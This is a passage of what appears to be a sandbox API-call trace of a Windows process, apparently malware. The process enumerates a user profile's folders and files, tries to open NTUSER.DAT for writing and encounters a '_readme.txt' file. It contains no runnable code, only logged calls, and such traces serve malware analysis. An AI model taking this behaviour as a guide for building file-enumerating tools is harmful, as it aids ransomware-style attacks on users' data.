nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0166.086] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0166.086] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0166.086] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe8a11780, ftLastAccessTime.dwHighDateTime=0x1d69ad4, ftLastWriteTime.dwLowDateTime=0xe8a11780, ftLastWriteTime.dwHighDateTime=0x1d69ad4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0166.086] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9758dc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9758dc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0166.086] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0166.086] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0166.086] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0166.086] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0166.086] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd97f1340, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd97f1340, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0166.086] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0166.086] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0166.086] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0166.086] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned=".DAT" [0166.086] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.086] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0166.086] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8f389c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0166.087] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned=".LOG1" [0166.087] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0166.087] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0166.087] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned=".LOG2" [0166.087] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0166.087] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0166.087] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned=".blf" [0166.087] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360ef10 | out: hHeap=0xcd0000) returned 1 [0166.087] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0166.087] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0166.087] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0166.087] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0166.087] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0166.087] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0166.087] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0166.087] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned=".ini" [0166.087] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0166.087] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9947fa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9947fa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0166.087] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0166.087] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0166.087] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0166.087] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0166.087] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0166.087] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0166.088] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0166.088] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd98d5b80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd98d5b80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0166.088] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19d49ca0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x19d49ca0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x19d49ca0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0166.088] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned=".txt" [0166.088] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a68 | out: hHeap=0xcd0000) returned 1 [0166.088] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19d49ca0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x19d49ca0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x19d49ca0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0166.088] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0166.088] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608bf8 | out: hHeap=0xcd0000) returned 1 [0166.088] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.088] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e88 | out: hHeap=0xcd0000) returned 1 [0166.088] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0166.088] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0166.088] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0166.088] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0166.088] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0166.088] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0166.088] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0166.088] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0166.088] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0166.088] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c4a8 | out: hHeap=0xcd0000) returned 1 [0166.088] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c598 | out: hHeap=0xcd0000) returned 1 [0166.088] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c9a8 | out: hHeap=0xcd0000) returned 1 [0166.088] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c8e0 | out: hHeap=0xcd0000) returned 1 [0166.088] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c408 | out: hHeap=0xcd0000) returned 1 [0166.088] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1d8 | out: hHeap=0xcd0000) returned 1 [0166.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c1b0 | out: hHeap=0xcd0000) returned 1 [0166.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c110 | out: hHeap=0xcd0000) returned 1 [0166.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c188 | out: hHeap=0xcd0000) returned 1 [0166.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c098 | out: hHeap=0xcd0000) returned 1 [0166.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c2f0 | out: hHeap=0xcd0000) returned 1 [0166.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c480 | out: hHeap=0xcd0000) returned 1 [0166.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c430 | out: hHeap=0xcd0000) returned 1 [0166.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c228 | out: hHeap=0xcd0000) returned 1 [0166.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c160 | out: hHeap=0xcd0000) returned 1 [0166.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0166.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c700 | out: hHeap=0xcd0000) returned 1 [0166.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3e0 | out: hHeap=0xcd0000) returned 1 [0166.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c2c8 | out: hHeap=0xcd0000) returned 1 [0166.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c278 | out: hHeap=0xcd0000) returned 1 [0166.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c4d0 | out: hHeap=0xcd0000) returned 1 [0166.089] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c4f8 | out: hHeap=0xcd0000) returned 1 [0166.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c520 | out: hHeap=0xcd0000) returned 1 [0166.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c548 | out: hHeap=0xcd0000) returned 1 [0166.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f18 | out: hHeap=0xcd0000) returned 1 [0166.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0166.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0166.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0166.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0166.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b449d0 | out: hHeap=0xcd0000) returned 1 [0166.090] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0166.090] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0166.090] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0166.090] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0166.090] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c548 | out: hHeap=0xcd0000) returned 1 [0166.090] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0166.090] PathFindFileNameW (pszPath="") returned="" [0166.090] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0166.090] HeapFree (in: 